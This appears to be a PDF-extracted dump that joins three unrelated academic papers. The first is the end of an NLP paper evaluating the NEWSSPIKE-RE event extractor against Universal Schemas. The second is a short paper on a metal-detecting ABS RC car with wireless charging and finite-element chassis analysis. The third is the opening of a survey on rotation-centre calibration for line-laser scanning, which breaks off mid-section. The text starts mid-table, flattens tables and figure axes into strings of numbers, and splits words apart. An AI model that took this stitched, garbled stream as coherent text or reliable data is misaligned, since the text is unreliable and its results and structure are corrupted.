0.87 fire(organization,person) 39 0.36 0.33 0.53 0.32 0.45 0.88 8 0.20 0.10 0.66 hit(event,location) 33 0.00 0.42 0.64 0.00 0.51 0.48 24 0.00 0.45 0.50 lead(person,organization/sports team) 119 0.77 0.86 0.87 0.57 0.73 0.77 14 0.30 0.36 0.62 leave(person,organization) 61 0.40 0.52 0.59 0.14 0.38 0.57 14 0.07 0.13 0.38 meet with(person,person) 137 0.74 0.86 0.92 0.48 0.73 0.88 14 0.28 0.56 0.93 nominate(person/politician,person) 44 0.12 0.38 0.54 0.13 0.44 0.77 27 0.11 0.53 0.75 pay(organization,money) 134 0.77 0.91 0.93 0.52 0.85 0.90 17 0.33 0.90 0.56 place(organization,person) 34 0.17 0.28 0.50 0.24 0.23 0.95 16 0.19 0.21 0.94 play(person/artist,person) 173 0.92 0.89 0.87 0.88 0.79 0.73 15 0.63 0.56 0.47 release(organization,person) 30 0.18 0.22 0.60 0.08 0.25 0.72 16 0.06 0.15 0.81 replace(person,person) 115 0.82 0.89 0.94 0.62 0.75 0.87 18 0.46 0.58 0.89 report(government agency,time) 140 0.37 0.84 0.91 0.09 0.74 0.83 35 0.06 0.52 0.70 report(written work,time) 130 0.64 0.85 0.83 0.43 0.82 0.74 22 0.38 0.58 0.51 return to(person/athlete,location) 45 0.14 0.34 0.50 0.03 0.30 0.49 21 0.08 0.23 0.78 shoot(person,number) 101 0.71 0.89 0.92 0.49 0.74 0.84 8 0.35 0.37 0.48 sign with(person,organization) 129 0.47 0.62 0.89 0.25 0.46 0.85 44 0.15 0.17 0.91 sign(organization,person) 110 0.45 0.71 0.85 0.26 0.63 0.79 26 0.15 0.27 0.66 unveil(organization,product) 88 0.43 0.71 0.44 0.26 0.52 0.30 22 0.31 0.22 0.63 vote(government,time) 32 0.29 0.24 0.74 0.32 0.25 0.77 19 0.35 0.22 0.83 win at(person,location) 100 0.24 0.68 0.85 0.08 0.60 0.90 40 0.01 0.42 0.90 win(person,event) 107 0.54 0.77 0.86 0.22 0.63 0.77 19 0.03 0.26 0.78 micro average 2,903 0.53 0.70 0.81 0.30 0.59 0.80 609 0.15 0.31 0.71 macro average 97 0.46 0.64 0.76 0.30 0.56 0.76 20 0.20 0.37 0.70 Table 2: Performance of extractors by event relation, reporting both precision and the area under the PR curve. The # column shows the number of true extractions in the pool of sampled output. NEWSSPIKE-RE (labeled N-RE) outperforms two implementations of Riedel’s Universal Schemas (See Section 7.3 for details). The advantage of NEWSSPIKE-RE over Universal Schemas is greatest on a diverse test set where each sentence has a distinct event phrase. diverse event phrases. Therefore we also measured the accuracy and the count of a “diverse” condition: only consider the subset of sentences with distinct event phrases. Table 1 shows the accuracy and the number of training examples. The basic temporal system brings us 0.50/0.62 micro- and macro- accuracy overall and 0.38/0.51 in the diverse condition. It shows that NewsSpikes are promising resources to generate the training set, but that elaboration is nec- essary. Yates09 gets 0.78/0.76 accuracy overall be- cause its textual features help it to recognize many good sentences with similar phrases. But for the di- verse condition, it gets lower precision because the distributional hypothesis fails to distinguish those correlated but different phrases. Although Ganitkevitch13 and Zhang13 leverage existing paraphrase databases, it is interesting that their accuracy is still not good. It is largely because many times the paraphrasing must depend on the context: e.g. “Cutler hits Martellus Bennett with TD in closing seconds.” is not good for the beat(team, team) relation, even though hit is a synonym for beat in general. These two systems show that it is not enough to use an off-the-shelf paraphrasing database for extraction. The ablation test shows the effectiveness of the temporal negation hypothesis: after turning off the relevant features and heuristic labels, the precision drops about 10 percentage points. In addition, the cross-spike factors bring NEWSSPIKE-RE about 22% more training sentences and also increase the accuracy. We did bootstrap sampling to test the statistical significance of NEWSSPIKE-RE’s improvement in accuracy over each comparison system and abla- tion of NEWSSPIKE-RE. For each system we com- puted the accuracy of 10 samples of 100 labeled outputs. We then ran the paired t-test over the ac- curacy numbers of each other system compared to 125 NEWSSPIKE-RE. For all but w/o cross the improve- ment is strongly significant with p-value less than 1%. The increase in accuracy compared to w/o cross has borderline significance (p-value 5.5%), but is a clear win with its 22% increase in training size. 7.3 Performance of the Event Extractors Most previous relation extraction approaches either require a manually labeled training set, or work only on a pre-defined set of relations that have ground instances from KBs. The closest work to NEWSSPIKE-RE is Universal Schemas (Riedel et al., 2013), which addresses the limitation of dis- tant supervision that the relations must exist in KBs. Their solution is to treat the surface strings, de- pendency paths, and relations from KBs as equal “schemas”, and then to exploit the correlation be- tween the instances and the schemas from a very large unlabeled corpus. In their paper, Riedel et al. evaluated only on static relations from Freebase and achieve state-of-the-art performance. But Universal Schemas can be adapted to handle events, by intro- ducing the events as schemas and heuristically find- ing seed instances. We set up a competing system (R13) as follows: (1) We take the NYTimes corpus published between 1987 and 2007 (Sandhaus, 2008), the dataset used by Riedel et al. (2013) containing 1.8 million NY Times articles; (2) The instances (i.e. the rows of the matrix) come from the entity pairs from the news ar- ticles; (3) There are two types of columns: some are the extraction features used by NEWSSPIKE-RE, in- cluding the lexicalized dependency paths described in Riedel et al.; others are event relations E = e(t1, t2); (4) For an entity pair (a1,a2), if there is an OpenIE extraction (a1,e,a2) and the entity types of (a1,a2) match (t1, t2), we assume the event rela- tion E is observed on that instance. As shown in Table 1, parallel news streams are a promising resource for clustering because of the strong correlation between the instances and the event phrases. We train another version of Universal Schemas R13P on the parallel news streams NS13. In particular, entity pairs from different NewsSpikes are used as different rows in the matrix. We would like to measure the precision and re- call of the extractors. But note that it is impos- sible to fully label all the sentences, so we follow the “pooling” technique described in (Riedel et al., 2013) to create the labeled dataset. For every com- peting system, we sample 100 top outputs for every event relation and add this to the pool. The anno- tators are shown these sentences and asked to judge whether the sentence expresses the event relation or not. After that, the labeled set become “gold” and can be used to measure the precision and pseudo- recall. There are in all 6,178 distinct sentences in the pool, since some outputs are produced by mul- tiple systems. Among them, 2,903 sentences are la- beled as positive. In Table 2, the # columns show the number of true extractions in the pool for every event relation. Similar to the diverse condition in Table 1, it is important that the extractor can correctly predict on diverse sentences that are dissimilar to each other. Thus we conducted a “diverse pooling”: for each system, we report numbers for the sentences with different dependency paths between the arguments for every discovered event. Figure 5(a) shows the precision pseudo-recall curve for all sentences for the three systems. NEWSSPIKE-RE outperforms the competing sys- tems by a large margin. For example, the area un- der the curve (AUC) of NEWSSPIKE-RE for all sen- tences is 0.80 while that of R13P and R13 are 0.59 and 0.30. This is a 35% increase over R13P and 2.7 times the area compared to R13. Similar increases in AUC are observed on diverse sentences. Table 2 further lists the breakdown numbers for each event relation, as well as the micro and macro average. Although Universal Schemas had some success for several relations, NEWSSPIKE-RE achieved the best F1 for 26 out of 30 event relations; best AUC for 26 out of 30. The advantage is even greater in the di- verse condition. It is interesting to see that R13P performs much better than R13, since the data com- ing from NYTimes is much noisier. A closer look shows that Universal Schemas tends to confuse correlated but different phrases. NEWSSPIKE-RE, however, rarely made these errors because our model can effectively exploit negative evidence to distinguish them. 7.3.1 Comparing to Distant Supervision Although the most event relations in Table 2 can- not be handled by the distant supervised approach, it is possible to match buy(org,org) to Freebase re- lations with appropriate database operators such as 126 0.0 0.2 0.4 0.6 0.8 1.0 0.0 0.2 0.4 0.6 0.8 1.0 R13: Uschema on NYT R13P: Uschema on NS13 NewsSpike-RE on NS13 Pseudo Recall P re c is io n (a) 0.0 0.2 0.4 0.6 0.8 1.0 0.0 0.2 0.4 0.6 0.8 1.0 R13: Uschema on NYT R13P: Uschema on NS13 NewsSpike-RE on NS13 Pseudo Recall P re c is io n DS on NYT (b) Figure 5: Precision pseudo-recall curves for (a) all event relations; (b) buy(org, org), this figure includes the distant supervision algorithm MIML learned from matching the Freebase relation5 to The New York Times. NEWSSPIKE-RE has AUC 0.80, more than doubling R13 (0.30) and 35% higher than R13P (0.59) for all event relations. join and select (Zhang et al., 2012). To evaluate how distant supervision performs, we introduce the system DS on NYT based on a manual mapping of buy(org,org) to the join relation4 in Freebase. Then we match its instances to NYTimes articles and fol- low the steps of Surdeanu et al. (2012) to train the extractor. The matching to NYTimes brings us 264 positive instances having 5,333 sentences, but unfortunately the sentence-level accuracy is only 13% based on examination of 100 random sentences. Figure 5(b) shows the PR curves for all the competing systems. Distant supervision predicts the top extractions cor- rectly because the multi-instance technique recog- nizes some common expressions (e.g. buy, acquire), but the precision drops dramatically since most pos- itive expressions are overwhelmed by the noise. 8 Conclusions and Future Work Popular distant supervised approaches have limited ability to handle event extraction, since fluent facts are highly time dependent and often do not exist in any KB. This paper presents a novel unsupervised approach for event extraction that exploits parallel news streams. Our NEWSSPIKE-RE system auto- matically identifies a set of argument-typed events from a news corpus, and then learns a sentential (micro-reading) extractor for each event. We introduced a novel, temporal negation heuris- tic for parallel news streams that identifies event phrases that are correlated, but are not paraphrases. We encoded this in a probabilistic graphical model 4 /organization/organization/companies_ acquired1/business/acquisition/company_acquired to cluster sentences, generating high quality training data to learn a sentential extractor. This provides negative evidence crucial to achieving high preci- sion training data. Experiments show the high quality of the gener- ated training sentences and confirm the importance of our negation heuristic. Our most important exper- iment shows that we can learn accurate event extrac- tors from this training data. NEWSSPIKE-RE out- performs comparable extractors by a wide margin, more than doubling the area under a precision-recall curve compared to Universal Schemas. In future work we plan to implement our system as an end-to-end online service. This would allow users to conveniently define events of interest, learn extractors for each event, and return extracted facts from news streams. Acknowledgments We thank Hal Daume III, Xiao Ling, Luke Zettle- moyer and the reviewers. This work was supported by ONR grant N00014-12-1-0211, the WRF/Cable Professorship, a gift from Google, and the Defense Advanced Research Projects Agency (DARPA) Ma- chine Reading Program under Air Force Research Laboratory (AFRL) prime contract no. FA8750-09- C-0181. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the view of DARPA, AFRL, or the US government. 127 References Eugene Agichtein and Luis Gravano. 2000. Snowball: extracting relations from large plain-text collections. In ACM DL, pages 85–94. Michele Banko, Michael J. Cafarella, Stephen Soderland, Matthew Broadhead, and Oren Etzioni. 2007. Open information extraction from the web. In Proceedings of the 20th International Joint Conference on Artificial Intelligence (IJCAI-07), pages 2670–2676. Regina Barzilay and Lillian Lee. 2003. Learning to paraphrase: an unsupervised approach using multiple- sequence alignment. In Proceedings of the 2003 Con- ference of the North American Chapter of the Associ- ation for Computational Linguistics on Human Lan- guage Technology (HLT-NAACL), pages 16–23. Regina Barzilay and Kathleen R McKeown. 2001. Ex- tracting paraphrases from a parallel corpus. In Pro- ceedings of the 39th Annual Meeting on Association for Computational Linguistics (ACL), pages 50–57. Edward Benson, Aria Haghighi, and Regina Barzilay. 2011. Event discovery in social media feeds. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies (HLT-NAACL), pages 389–398. Sergey Brin. 1999. Extracting patterns and relations from the world wide web. In The World Wide Web and Databases, pages 172–183. Andrew Carlson, Justin Betteridge, Bryan Kisiel, Burr Settles, Estevam R. Hruschka Jr., and Tom M. Mitchell. 2010. Toward an architecture for never- ending language learning. In Proceedings of the AAAI Conference on Artificial Intelligence (AAAI-10). Michael Collins. 2002. Discriminative training meth- ods for hidden Markov models: Theory and experi- ments with perceptron algorithms. In Proceedings of the ACL-02 conference on Empirical methods in natu- ral language processing-Volume 10, pages 1–8. Mark Craven and Johan Kumlien. 1999. Constructing biological knowledge bases by extracting information from text sources. In Proceedings of the Seventh Inter- national Conference on Intelligent Systems for Molec- ular Biology (ISMB), pages 77–86. Bill Dolan, Chris Quirk, and Chris Brockett. 2004. Un- supervised construction of large paraphrase corpora: Exploiting massively parallel news sources. In Com- putational Linguistics, page 350. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying relations for open information extraction. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1535–1545. Jenny Rose Finkel, Trond Grenager, and Christopher Manning. 2005. Incorporating non-local informa- tion into information extraction systems by Gibbs sam- pling. In Proceedings of the 43rd Annual Meeting on Association for Computational Linguistics (ACL), pages 363–370. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The paraphrase database. In Joint Human Language Technology Con- ference/Annual Meeting of the North American Chap- ter of the Association for Computational Linguistics (HLT-NAACL 2013), pages 758–764. Takaaki Hasegawa, Satoshi Sekine, and Ralph Grishman. 2004. Discovering relations among named entities from large corpora. In Proceedings of the 42nd Annual Meeting on Association for Computational Linguistics (ACL), page 415. Raphael Hoffmann, Congle Zhang, Xiao Ling, Luke Zettlemoyer, and Daniel S Weld. 2011. Knowledge- based weak supervision for information extraction of overlapping relations. In Proceedings of the 49th An- nual Meeting of the Association for Computational Linguistics: Human Language Technologies (HLT- ACL), pages 541–550. Ruihong Huang and Ellen Riloff. 2013. Multi-faceted event recognition with bootstrapped dictionaries. In the Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (HLT-NAACL), pages 41–51. Dekang Lin and Patrick Pantel. 2001. Discovery of infer- ence rules for question-answering. Natural Language Engineering, 7(4):343–360. Xiao Ling and Daniel S Weld. 2012. Fine-grained entity recognition. In Association for the Advancement of Artificial Intelligence (AAAI). David McClosky, Mihai Surdeanu, and Christopher D Manning. 2011. Event extraction as dependency pars- ing. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies (HLT-ACL), pages 1626– 1635. Mike Mintz, Steven Bills, Rion Snow, and Daniel Juraf- sky. 2009. Distant supervision for relation extrac- tion without labeled data. In Proceedings of the 47th Annual Meeting of the Association for Computational Linguistics (ACL), pages 1003–1011. Ndapandula Nakashole, Martin Theobald, and Gerhard Weikum. 2011. Scalable knowledge harvesting with high precision and high recall. In Proceedings of the fourth ACM international conference on Web search and data mining (WSDM), pages 227–236. George L Nemhauser and Laurence A Wolsey. 1988. In- teger and combinatorial optimization, volume 18. Wi- ley New York. 128 Roi Reichart and Regina Barzilay. 2012. Multi event ex- traction guided by global constraints. In Proceedings of the 2012 Conference of the North American Chap- ter of the Association for Computational Linguistics: Human Language Technologies (HLT-NAACL), pages 70–79. Kevin Reschke, Martin Jankowiak, Mihai Surdeanu, Christopher D Manning, and Daniel Jurafsky. 2014. Event extraction using distant supervision. In Lan- guage Resources and Evaluation Conference (LREC). Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions with- out labeled text. In Machine Learning and Knowledge Discovery in Databases (ECML), pages 148–163. Sebastian Riedel, David McClosky, Mihai Surdeanu, An- drew McCallum, and Christopher D Manning. 2011. Model combination for event extraction in BioNLP 2011. In Proceedings of the BioNLP Shared Task 2011 Workshop, pages 51–55. Sebastian Riedel, Limin Yao, Benjamin M. Mar- lin, and Andrew McCallum. 2013. Relation extraction with matrix factorization and universal schemas. In Joint Human Language Technology Con- ference/Annual Meeting of the North American Chap- ter of the Association for Computational Linguistics (HLT-NAACL). Alan Ritter, Oren Etzioni, Sam Clark, et al. 2012. Open domain event extraction from twitter. In Proceedings of the 18th ACM SIGKDD international conference on Knowledge discovery and data mining (KDD), pages 1104–1112. Evan Sandhaus. 2008. The New York Times annotated corpus. Linguistic Data Consortium. Yusuke Shinyama and Satoshi Sekine. 2006. Preemp- tive information extraction using unrestricted relation discovery. In Proceedings of the main conference on Human Language Technology Conference of the North American Chapter of the Association of Com- putational Linguistics (HLT-NAACL), pages 304–311. Mihai Surdeanu, Julie Tibshirani, Ramesh Nallapati, and Christopher D Manning. 2012. Multi-instance multi- label learning for relation extraction. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP), pages 455– 465. Shingo Takamatsu, Issei Sato, and Hiroshi Nakagawa. 2011. Probabilistic matrix factorization leveraging contexts for unsupervised relation extraction. In Ad- vances in Knowledge Discovery and Data Mining, pages 87–99. Fei Wu and Daniel S. Weld. 2007. Autonomously se- mantifying wikipedia. In Proceedings of the Inter- national Conference on Information and Knowledge Management (CIKM), pages 41–50. Limin Yao, Aria Haghighi, Sebastian Riedel, and Andrew McCallum. 2011. Structured relation discovery using generative models. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 1456–1466. Limin Yao, Sebastian Riedel, and Andrew McCallum. 2012. Unsupervised relation discovery with sense dis- ambiguation. In Proceedings of the 50th Annual Meet- ing of the Association for Computational Linguistics (ACL), pages 712–720. Alexander Yates and Oren Etzioni. 2009. Unsupervised methods for determining object and relation synonyms on the web. Journal of Artificial Intelligence Research, 34(1):255. Congle Zhang and Daniel S Weld. 2013. Harvesting par- allel news streams to generate paraphrases of event re- lations. In Proceedings of the 2013 Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learning (EMNLP), pages 455–465. Congle Zhang, Raphael Hoffmann, and Daniel S Weld. 2012. Ontological smoothing for relation extraction with minimal supervision. In Association for the Ad- vancement of Artificial Intelligence (AAAI). 129 130 work_rmebpspynnarhfkf425gsjanaq ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-005 47 Design and Analysis of Thermoplastic Metal Detector RC Car with Wireless Charging Haifa El-Sadi Wentworth institute of technology Mechanical engineering Department Boston, MA e-mail: elsadih@wit.edu Matthew R. Cole, Aaron M. Denis Wentworth institute of technology Mechanical engineering Department Boston, MA Derek Fernandes Wentworth institute of technology Mechanical engineering Department Boston, MA Alberto Benhamu-Chocron Wentworth institute of technology Mechanical engineering Department Boston, MA Abstract—The RC Car industry is a growing industry that will always be a past time for the older generation. This research is focused on a specific type of RC Car which is a Metal Detecting one. Metal Detectors have been developed for many years. Through research there aren’t many metal detecting RC Cars on the market. Currently it’s extremely limited in range and depth of detection. The goal of this research is to improve, build and test a new RC-metal detector technology. A thermoplastic-ABS used to build the chassis of the RC- metal detector. ABS is easily machined, sanded, glued and painted. Finite element analysis is a powerful tool that allows us to quickly analyze and refine a design. When the Chassis fixed at front Differential (Displacement), the value of the maximum stress and the deflection are higher than when the Chassis Fixed at Rear Differential. The maximum deflection is shown as about 1.339 inches. This value is the resultant of the deflection in all three directions. This research includes, a cost analysis for each piece of the car, group goals for the RC Car and Metal Detector. A working prototype is designed before moving into the final design phase in order to assure that the best possible product can be produced. There is a wireless charging station that ease the process of recharging the battery. Keywords-Metal Detector; Finite Element; Thermoplastic; RC I. INTRODUCTION The challenge for this project is to design and build a remote-controlled car that incorporates two features that no other car possesses. RC Car owners have tedious work to do every time the car needs to be charged. Some components must be taken apart to retrieve the battery to charge it. The wireless charging feature being implemented in the design will eliminate this extra work, while providing a smooth charging operation where no disassembling will take place. The design and development of remotely operated solar- powered mobile metal detector robot is a rescue robot to autonomously operate in detecting the threat of land mines. During the First and Second World War, military forces deployed many bombs on land filed to fight between soldiers on the battlefield. There were many countries like Libya, Cambodia and Laos had explosive weapons that did not explode when fired or dropped on the ground. In fact, more than twenty thousand people have been killed or injured by unexploded bombs [1]. A remotely solar-powered mobile metal detector robot has been designed and implemented. The system is using RF communication with Atmega32 MCU in embedded system domain. The robot moves in particular direction using the handheld remote. The experimental work has been carried out carefully. The metal detector sensor worked as the required specification for the metal detection sensor. The testing demonstrated that the robot would not pose any performance problem for the installation of the metal detection robot such as the merits and drawbacks of mounting the sensor, cost, support vehicle, handling the cable between the robot and also easiness of the adjustment [2]. Nation et al. [3] demonstrated the accuracy of HHMD in the identification and localization of metallic foreign bodies. They proposed an emergency room foreign body protocol that uses HHMD as an early screening tool in triage in order to expedite the process of obtaining Otolaryngology consultation and potentially shorten the wait time to the operating room or discharge. In instances were outside films are previously performed, HHMD use may be able to minimize the overall radiation exposure to children by obviating the need for repeat radiographs. As the sensitivity is not 100%, a negative HHMD screening does not negate the need for a standard radiograph in order to avoid missed MFBs. HHMD is best suited for detection of coins, which accounts for the majority of the MFB ingestions, and may not be suitable for all metallic objects since the amount of metal may decrease its sensitivity. Holm, Katja F et. al. [4] evaluated a commercially available metal detector for detecting CIEDs. Design. Observational study including pacemaker patients (n = 70) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 48 and a control group without pacemaker ( n = 95). The investigational device was a hand-held metal detector for detecting metal or electricity wiring. Results. The metal detector detected the pacemaker in all pacemaker patients and thus exhibited a sensitivity of 100%. The specificity of the metal detector was 86%, and the negative predictive value was 100%. Thirteen individuals without pacemakers were falsely identified as having an implanted device due to implanted prosthetic material or elements of clothing. The objective of this research is to design a RC car that will provide a smooth wireless charging process and incorporate a metal detector. RC Cars require tedious work in order to charge the battery. It will offer a wireless charging station where no disassembling of the car will be required. Apart from technical innovations, an improved metal detector will be incorporated that will be useful on beaches and in parks to search for lost jewelry. A long-term goal with an unlimited budget is to use this car to detect mines for the army. This car could drive over the field before infantry and passenger vehicles drive over it to protect them from mines or IEDs. II. MATERIAL AND COST Acrylonitrile Butadiene Styrene (ABS) is an opaque thermoplastic and amorphous polymer. ABS becomes liquid at a certain temperature, 221 degrees Fahrenheit. They can be heated to their melting point, cooled, and re-heated again without significant degradation. Instead of burning, thermoplastics like ABS liquefy which allows them to be easily injection molded and then subsequently recycled. ABS is easily machined, sanded, glued and painted. This makes it a great material for prototyping. Table 1 shows the required material to build the RC-car metal detector. TABLE I. THE MATERIAL AND THE COMPONENTS OF RC-CAR METAL DETECTOR A. Finite Element Analysis of Material SOLIDWORKS Simulation uses the displacement formulation of the finite element method to calculate component displacements, strains, and stresses under internal and external loads. The geometry under analysis is discretized using tetrahedral (3D), and solved by iterative solver. SOLIDWORKS Simulation using p adaptive element type, the solution has converged. The material parameters were obtained and the results were simulated. One of the most important inputs to the model is the elastic modulus E of the material. The elastic modulus defines the stiffness (resistance to deflection) of the material. Its value is determined from material tests. A material with a high value of E will deflect less than one with a lower value of E. By applying finite element analysis, we can accurately observe the stress distributions in the various layers of the material as shown in Figures 1, 2, 3 and 4. Figure 1 shows Chassis Fixed at Rear Differential, the highest stress is 4039 psi with mesh size was 0.2. However, the maximum deflection was 0.7 inches as shown in Figure 2. Simulates impact on underside of chassis. B. ABS Plastic Material Data Elastic Modulus: 290075.4753 psi, Shear Modulus: 46252.53454 psi, and Tensile Strength: 4351.13213 psi International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 49 Figure 1. Chassis Fixed at Rear Differential (Von Mises) Figure 2. Chassis Fixed at Rear Differential (Displacement) Figure 3 shows Chassis Fixed at front Differential (Displacement), the highest stress is 8375 psi with mesh size was 0.2. However, the maximum deflection was 1.339 inches as shown in Figure 4, it Simulates impact on underside of chassis International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 50 Figure 3. Chassis Fixed at Front Differential (Von Mises) Figure 4. Chassis Fixed at front Differential (Displacement) III. DESIGN PROTOTYPE AND TESTING One of the biggest challenges was designing a chassis from scratch that would house all the components necessary to operate a RC Car. The chassis also needed to be strong enough to not only hold the weight of the car and all its components, as shown in Figure 5, but also handle the torque and power that would be outputted from the car. The designed chassis was more than suitable to hold all the components and handle the force of the motor. There was more room than anticipated, which was useful for placing the components and keeping things away from all the moving parts. In the end, the RC Car is programmed and moves as planned. The metal detector detects deeper than expected. Finally, the wireless charging station works better than anticipated. Figure 7 shows the Wireless Charging Ramp Setup. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 51 Figure 5. Detailed Picture of all Components Figure 6. Layout of the Electrical Circuit Figure 6 shows the layout of the electrical circuit of the RC-car metal detector. The main circuit is powered by a battery through a mechanical switch. If the switch is turned ON, power is supplied to a motor and a servo. The speed of the motor is regulated by an Electronic Speed Control Circuit (ESC). The servo on the hand is controlled by a Raspberry Pi computer board. The circuit also has four terminals that are used to connect to an external charger once the battery has depleted. Figure 7. Wireless Charging Ramp Setup Figure 8. Final prototype IV. CONCLUSION This project aimed at creating a thermoplastic RC Car designed with a purpose, more than just an average recreational toy. This was bringing up the reality of a much greater idea. The wireless charging aspect of the RC Car will mostly be aimed towards small scale vehicles. However, the metal detection can be a very realistic and useful application for much bigger vehicles. The idea that an unmanned vehicle can be used for detecting not only metals, but harmful objects could potentially be a breakthrough for something like the military. IED’s are a very serious issue for the military, being able to sniff these out without having to risk the lives of anyone would be huge. Completing this project with a limited budget would show a lot, especially when someone like the military could spend endless amounts of money in order to perfect the system for more dangerous and life like scenarios. FEA analysis was used to test the chassis, When the Chassis Fixed at front Differential (Displacement), International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 52 the value of the maximum stress and the deflection are higher than when the Chassis Fixed at Rear Differential. V. ACKNOWLEDGEMENTS The authors sincerely appreciate the immense and highly valued support from the Dean of Engineering, Dean Fred Driscoll REFERENCES [1] Handicap International, Fatal Footprint: The Global Human Impact of Cluster Munitions. November 2006. Available from: URL: http://www.mineaction.org [2] F.Y.C. Albert, C.H.S. Mason, C.K.J. Kiing, K.S. Ee, K.W. Chan, “Remotely Operated Solar-powered Mobile Metal Detector Robot”, Procedia Computer Science, Volume 42, 2014, Pages 232-239 [3] Nation, Javan and Jiang, Wen, “The utility of a handheld metal detector in detection and localization of pediatric metallic foreign body ingestion”, International Journal of Pediatric Otorhinolaryngology January 2017 92:1-6 [4] Holm, Katja F, Hjortshøj, Søren, Pehrson, Steen, Svendsen, Jesper Hastrup, Riahi, Sam, “Implanted cardiac devices are reliably detected by commercially available metal detectors”, Scandinavian Cardiovascular Journal. Oct2013, Vol. 47 Issue 5, p271-274. 4p. http://www.mineaction.org/ work_rn4umcfjb5acliccy3njrowvca ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 48 Rotation center calibration based on line laser rotating platform Lei Doudou School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: ccdd007123@qq.com Liu Baolong School of Computer Science and Engineering Xi’an Technological University Xi’an,710032 China e-mail: liu.bao.long@hotmail.com Yao Huimin Eighth of production plant, the company china petrdeum, Changqing oilfield, Xi’an Xi’an, 710021, China Abstract—Line lasers are of great significance in many fields such as industrial inspection, machine vision, cultural relics identification, mechanical design, and medical oral cavity. The three-dimensional reconstruction of the line laser can accurately obtain the three-dimensional information of the surface of the object, and quickly complete the three-dimensional contour reconstruction of the object to be tested. In the online laser rotation scanning, the object rotates around a certain point, which is a rotation center, and the calibration of the rotation center is the main factor that restricts the accuracy of the three-dimensional contour. At present, the calibration of the center of rotation is mainly obtained by the characteristics of a circle (ball, cylinder, cone, etc.). This paper mainly introduces the basic process of rotating scanning, rotating center, and rotating methods as well as their advantages and disadvantages. First, the basic process of rotating scanning is briefly introduced. Secondly, the definition and content of the rotating center are introduced. Then, the calibration methods of three rotating centers (ellipse fitting method, symmetry method, plane fitting method) are introduced. Finally, the advantages and disadvantages of the three calibration methods and their respective applications are summarized. Keywords-Line laser; rotary scanning; Rotation center; calibration I. INTRODUCTION In today's life, two-dimensional information can no longer meet people's daily needs. The three- dimensional information has thus been deeply researched and developed. Among them, the line laser is widely used in the three-dimensional reconstruction process. Line laser three-dimensional scanning is to project one or more line lasers to the measured object, extract the laser stripe in the image, and calculate the three-dimensional data of the surface of the laser line, usually using high-precision three-coordinate, rotating platform or camera alignment The laser sensor performs positioning to complete three-dimensional scanning of the surface of the object to be measured, and obtain surface data of the three-dimensional object[1][2]. According to the different mechanical displacement platforms, mechanical scanning mainly has two implementations of translation platform and rotary platform. Rotating scanning is more convenient and faster. A more accurate rotation center calibration can improve the accuracy of point cloud reconstruction and improve the 3D contour reconstruction of the measured object. The reconstruction of the rotating platform can be divided into three types according to the different movement modes: the first is that the camera rotates around the rotating axis [3], and the measured object does not move; the second is that the camera does not move, and the object rotates with the rotating platform [4] The third is that the camera and the object are combined and rotated at the same time[5]. The rotating platform is suitable for scanning objects with swivel features. The object is placed on a rotating platform for linear laser rotation scanning. At DOI: 10.21307/ijanmc-2019-033 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 49 this time, the visible object is rigidly transformed around the axis of the rotating platform [6], and the left and right camera point clouds can be constructed by using the rotation center and the rotation angle obtained after the platform calibration process. The rotation matrix between the two, the rotation matrix is multiplied by the current point cloud, the point cloud obtained by the left and right cameras can be registered to the same coordinate system, thereby realizing the automatic registration of the point cloud on the surface of the rotating platform [7]. II. CAMERA CALIBRATION Calibration is simply a matter of establishing a reference point between a pixel coordinate system of an image and a world three-dimensional coordinate system. The essence of the transformation relationship is the geometric principle of camera imaging. The ultimate goal of calibration is to obtain the camera's internal parameters as well as external parameters. The internal parameters of the camera are determined by the camera's own characteristics. The external parameters of the camera are used to establish the mutual conversion relationship between the local world coordinate system and the camera coordinate system in the actual process [8][9]. The camera's parameters have a direct impact on the accuracy of the reconstructed model, so the accuracy of the camera parameters is very important. In general, camera calibration is required before solving the center of rotation. III. ROTATION CENTER CALIBRATION Because the line laser scans once, it can only measure the surface of the object to be measured at a given angle of view. If you want to measure the contour of an object for a week, you can measure it by rotation, measure the object from multiple angles of view, and point cloud data from multiple angles of view. Spliced in the same coordinate system. Accurately calibrating the center of the turntable (rotation center) is the key to rotating measurements and multi-view assembly. Rotation Center: In a plane, a figure rotates a certain angle around a point O to get the other figure to change into rotation, and point O is the center of rotation. During the rotational scanning, the measured object starts from a fixed angle and starts to rotate 360 degrees around the axis of rotation or the center of rotation. However, the center of rotation of the rotating platform is unknown. In order to obtain the three- dimensional contour of the rotating object, it is necessary to obtain the rotation center of the rotating platform by means of a calibration block or a pasting marker point. After the center of rotation is obtained, the subsequent rotation and splicing can be performed. Since the subsequent splicing work is spliced according to the position of the center of rotation, the extraction work of the center of rotation is very important. The schematic diagram of the line laser double triangle rotation scan is shown in the figure below, where the center of rotation is the center of the stage. Laser Right camera Left camera objectiv e table Rotating platform rotation direction Figure 1. Schematic diagram of line laser double triangle rotation scanning IV. ROTATION CENTER CALIBRATION METHOD A. Ellipse fitting method The center of rotation can also be obtained by dividing the plane edge of the rotating platform in the left and right images, and then performing ellipse fitting on the obtained plane edge, and obtaining the center coordinates of the ellipse by the least squares fitting method. It is the center of rotation of the rotating platform [10]. x y F L1 L2O Figure 2. Ellipse Fitting 